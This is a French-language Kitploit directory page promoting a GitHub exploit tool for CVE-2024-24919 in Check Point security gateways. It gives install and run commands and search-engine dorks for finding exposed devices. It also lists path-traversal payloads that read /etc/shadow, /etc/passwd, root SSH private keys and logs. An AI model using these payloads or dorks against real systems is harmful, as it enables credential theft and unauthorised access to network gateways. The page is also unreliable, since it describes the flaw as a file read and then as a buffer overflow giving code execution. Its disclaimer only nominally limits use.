Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-24919 — CVE-2024-24919 exploit | Kitploit
Outils/GitHubGitHub/goatsecurity/cve-2024-24919
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubgoatsecurity/cve-2024-24919

CVE-2024-24919

CVE-2024-24919 exploit

Voir le dépôt
2011il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil d'exploitation RCE de la passerelle de sécurité Check Point (CVE-2024-24919)

Aperçu

Ce dépôt contient un outil pour exploiter la vulnérabilité CVE-2024-24919 dans les passerelles de sécurité Check Point. L'outil est un multi-scanner capable d'identifier les appareils vulnérables et un exploit mono-cible capable de prendre le contrôle total de l'appareil affecté.

CVE-2024-24919 est une vulnérabilité de divulgation d'informations de gravité élevée qui permet à un attaquant de lire à distance des fichiers arbitraires sur une passerelle de sécurité Check Point. Cette vulnérabilité peut être exploitée pour voler des informations sensibles, telles que des mots de passe et des fichiers de configuration.

Avertissement :

Cet outil est fourni à des fins éducatives uniquement. Il ne doit pas être utilisé pour attaquer des systèmes vulnérables sans le consentement explicite du propriétaire. Les auteurs de cet outil ne sont pas responsables des dommages pouvant résulter de son utilisation.

Comment ça marche

L'exploit fonctionne en envoyant une requête HTTP spécialement conçue à l'appareil vulnérable. La requête déclenche un débordement de tampon dans le firmware de l'appareil, ce qui permet à l'attaquant d'exécuter du code arbitraire. L'exploit peut ensuite être utilisé pour prendre le contrôle total de l'appareil.

Prérequis

  • Python 3
  • colorama
  • requests

Installation

root@kitploit:~
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt

Utilisation

Vous pouvez scanner une seule cible ou plusieurs !

root@kitploit:~
python cve-2024-24919.py

**Dorks **

root@kitploit:~
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"

** Capture d'écran de l'outil **

ss

$ Chemins de l'outil : ```

root@kitploit:~
    'aCSHELL/../../../../../../../../../../../etc/passwd',
    
    'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
    
    'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
    
    'aCSHELL/../../../../../../../../../../../var/log/syslog',
    
    'aCSHELL/../../../../../../../../../../../var/log/auth.log',
    
    #'aCSHELL/../../../../../../../../../../../var/log/messages',
    
    'aCSHELL/../../../../../../../../../../../etc/group',
    
    'aCSHELL/../../../../../../../../../../../etc/shadow',
    
    'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
    
    'aCSHELL/../../../../../../../../../../../etc/hostname',
    
    'aCSHELL/../../../../../../../../../../../etc/hosts',
    
    'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
Télécharger l’outil